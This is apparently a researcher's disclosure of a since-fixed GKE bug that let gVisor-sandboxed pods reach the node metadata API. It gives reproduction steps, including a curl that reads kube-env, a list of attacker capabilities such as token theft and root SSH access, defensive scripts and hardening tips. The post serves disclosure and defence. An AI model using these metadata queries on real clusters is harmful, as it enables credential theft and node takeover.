Escaping GKE gVisor sandboxing using metadata

Introduction

GKE (Google Kubernetes Engine) is a Google Cloud service that provides managed Kubernetes clusters. The cluster nodes run on Google Cloud VM instances, while the control plane and the network are fully managed by GKE.

GKE offers a sandboxing feature (https://cloud.google.com/kubernetes-engine/docs/concepts/sandbox-pods), based on gVisor (https://gvisor.dev/docs/), that protects the host kernel from untrusted code. This sandboxing provides strong isolation and allows SaaS businesses to execute unknown code submitted by their users.

I tried to use this feature to run isolated workloads and found that the isolation was not entirely effective: under certain conditions, the metadata API was reachable from sandboxed pods.

Network isolation using network policy

By default, all pods in a Kubernetes cluster can communicate with each other. GKE recommends using Network Policy to restrict the network traffic between pods (https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster#restrict_with_network_policy).

When running untrusted code, it is a good practice to isolate your clients from each other and from your own services.

With this feature, it is easy to define a policy, attach it to a group of pods, and restrict the network access of these pods.
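A minimal sketch of such a policy, assuming each client runs in its own namespace (the namespace name `tenant-a` and the policy name `tenant-isolation` are hypothetical): the empty `podSelector` selects every pod in the namespace, and ingress is only accepted from pods of that same namespace. The manifest is printed by a small bash function so it can be reviewed before being piped into `kubectl apply -f -`.

```shell
#!/usr/bin/env bash
set -euo pipefail

# Print a NetworkPolicy isolating every pod of a tenant namespace:
# ingress is only allowed from pods living in the same namespace.
# The namespace passed as argument is a hypothetical example.
tenant_isolation_policy() {
  local namespace="$1"
  cat <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: tenant-isolation
  namespace: ${namespace}
spec:
  podSelector: {}          # applies to all pods in the namespace
  policyTypes:
    - Ingress
  ingress:
    - from:
        - podSelector: {}  # only pods from the same namespace
EOF
}

# Usage (requires kubectl and a cluster with network policy enabled):
#   tenant_isolation_policy tenant-a | kubectl apply -f -
```

This only restricts incoming traffic between tenants; egress, including traffic to the metadata server, is left untouched by this policy.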

Sandbox metadata protection

The Google Cloud team documents how to harden workload isolation with GKE Sandbox (https://cloud.google.com/kubernetes-engine/docs/how-to/sandbox-pods#sandboxed-application) and gives some hints on how to configure and test access to the metadata server.

To validate that the filtering is properly enabled, you can launch a new pod and run the following command:

curl -s "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" -H "Metadata-Flavor: Google"

As described in the documentation, this command fails because filtering denies access to the metadata API.

By default, the instance metadata API server is not supposed to be accessible from any sandboxed pod.
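To run the same check from a script (for example in a test pod scheduled on the gVisor node pool), the request can be wrapped in a small bash helper. This is a sketch: any HTTP status other than 200, including a connection failure (reported by curl as `000`), is treated as blocked, and the 3-second timeout is an arbitrary choice.

```shell
#!/usr/bin/env bash
set -euo pipefail

# Default target: the kube-env attribute used in the documentation check.
METADATA_URL_DEFAULT="http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env"

# Return 0 if the endpoint answers with HTTP 200, 1 otherwise.
# An optional first argument overrides the URL.
metadata_reachable() {
  local url="${1:-$METADATA_URL_DEFAULT}"
  local code
  # -w prints the status code; curl prints 000 when the request fails,
  # and "|| true" keeps a curl error from aborting the script.
  code="$(curl -s -o /dev/null -w '%{http_code}' --max-time 3 \
    -H 'Metadata-Flavor: Google' "$url" || true)"
  [[ "$code" == "200" ]]
}

# Usage inside a sandboxed pod:
#   if metadata_reachable; then echo "WARNING: metadata API reachable"; else echo "OK: blocked"; fi
```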

Bug found

While testing network isolation for untrusted pods, I enabled network policy on the cluster and applied some network filtering rules to the pods I wanted to isolate.

After more testing, I found that I was able to query the metadata API: the network filtering that the GKE team applies to gVisor-sandboxed pods was entirely disabled when network policy was enabled.

Since this sandboxing feature is meant to run untrusted code, this would give an attacker access to sensitive information about the node, the project and the Kubernetes cluster.

The bug was reported to the VRP team and quickly fixed. In the meantime, I was able to mitigate it by manually filtering the 169.254.169.254 IP in the network policy applied to these pods.
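That mitigation can be sketched as an egress rule that allows every destination except the metadata IP. This is a minimal example, not necessarily the exact policy I applied: the `app` label value matches the fedora test deployment used in the reproduction steps, the policy name is hypothetical, and allowing `0.0.0.0/0` is an assumption you should tighten for real workloads.

```shell
#!/usr/bin/env bash
set -euo pipefail

# Print a NetworkPolicy letting the selected pods reach any address
# except the instance metadata server (169.254.169.254).
# The label value is an example; "fedora" matches the test deployment.
deny_metadata_policy() {
  local app_label="$1"
  cat <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-metadata-${app_label}
spec:
  podSelector:
    matchLabels:
      app: ${app_label}
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 169.254.169.254/32
EOF
}

# Usage (requires kubectl and network policy enforcement on the cluster):
#   deny_metadata_policy fedora | kubectl apply -f -
```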

How to reproduce

You can follow the steps here: https://cloud.google.com/kubernetes-engine/docs/how-to/sandbox-pods

Create a new cluster with network policy enabled

gcloud container clusters create cluster-name --enable-network-policy --zone europe-west1-c

Create a new gVisor node pool

gcloud container node-pools create gvisor \
  --cluster=cluster-name \
  --node-version=1.16.13-gke.401 \
  --machine-type=e2-standard-2 \
  --image-type=cos_containerd \
  --sandbox type=gvisor --zone europe-west1-c

Apply the test configuration from the documentation

# sandbox-metadata-test.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: fedora
  labels:
    app: fedora
spec:
  replicas: 1
  selector:
    matchLabels:
      app: fedora
  template:
    metadata:
      labels:
        app: fedora
    spec:
      runtimeClassName: gvisor
      containers:
        - name: fedora
          image: fedora
          command: ['/bin/sleep', '10000']

Launch a shell

kubectl exec -it pod-name -- /bin/sh

Enjoy full access to the metadata API

curl "http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env" -H "Metadata-Flavor: Google"
...
ALLOCATE_NODE_CIDRS: "true"
API_SERVER_TEST_LOG_LEVEL: --v=3
...

Going deeper

With this metadata exposure bug, an attacker may gain access to sensitive information about the node, project and Kubernetes cluster.

Depending on the configuration, this could allow an attacker to:

read the project ID
read public SSH keys
get node information (name, IP, ...)
add their own SSH key and gain root access on the node
get the Kubernetes configuration and certificates
access the Kubernetes cluster
impersonate a Kubernetes node
retrieve a service account token
access / create / edit / delete project resources
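To check which of these items are exposed from a given pod, a defender can probe a few well-known metadata paths. A sketch under assumptions: the paths below are standard Compute Engine metadata endpoints chosen to match the list above, the list is not exhaustive, and the script only reports HTTP status codes without printing the sensitive response bodies.

```shell
#!/usr/bin/env bash
set -euo pipefail

# Base URL of the metadata server; can be overridden via the environment.
METADATA_BASE="${METADATA_BASE:-http://169.254.169.254/computeMetadata/v1}"

# A few paths matching the risks listed above (not exhaustive).
SENSITIVE_PATHS=(
  "project/project-id"
  "project/attributes/ssh-keys"
  "instance/hostname"
  "instance/attributes/kube-env"
  "instance/service-accounts/default/token"
)

# Print "<status> <path>" for each path (000 means the request failed).
# Return 0 if nothing answered with 200, 1 if at least one path is exposed.
audit_metadata() {
  local path code exposed=0
  for path in "${SENSITIVE_PATHS[@]}"; do
    code="$(curl -s -o /dev/null -w '%{http_code}' --max-time 3 \
      -H 'Metadata-Flavor: Google' "${METADATA_BASE}/${path}" || true)"
    echo "${code} ${path}"
    if [[ "$code" == "200" ]]; then
      exposed=$((exposed + 1))
    fi
  done
  [[ "$exposed" -eq 0 ]]
}

# Usage inside the pod to audit:
#   audit_metadata || echo "metadata exposed"
```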

Better isolation of untrusted code in GKE

Even when the isolation works properly, there are many ways to protect yourself against this kind of metadata exposure.

A few recommendations for running untrusted code in GKE:

Always double-check that the network policy is properly applied
Filter out all internal ranges and whitelist only the required ones
gVisor is fine but may be tricky to configure in Kubernetes; use dmesg to double-check that you are running inside the sandbox
Do not use the default service account as the node instance identity
You can use multiple projects to isolate workloads / clients
Do not use the cluster DNS
Create a specific node pool for untrusted code
Use workload identity https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity
Use metadata concealment https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata#concealment
Use shielded GKE nodes https://cloud.google.com/kubernetes-engine/docs/how-to/shielded-gke-nodes
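For the dmesg tip, a sketch: inside a gVisor sandbox, `dmesg` returns gVisor's own synthetic boot messages (typically beginning with "Starting gVisor...") rather than the host kernel log. The helper below just looks for the string `gVisor` in that output; treat it as a heuristic, not a security guarantee.

```shell
#!/usr/bin/env bash
set -euo pipefail

# Return 0 if the kernel log read on stdin looks like gVisor's synthetic log.
looks_like_gvisor() {
  grep -q 'gVisor'
}

# Check the current environment. If dmesg is not permitted, the log is
# empty and the check fails closed (reports "not gVisor").
running_in_gvisor() {
  local log
  log="$(dmesg 2>/dev/null || true)"
  # A here-string avoids a pipeline, so grep exiting early cannot
  # turn a match into a failure under pipefail.
  looks_like_gvisor <<<"$log"
}

# Usage inside a pod:
#   if running_in_gvisor; then echo "sandboxed"; else echo "NOT sandboxed"; fi
```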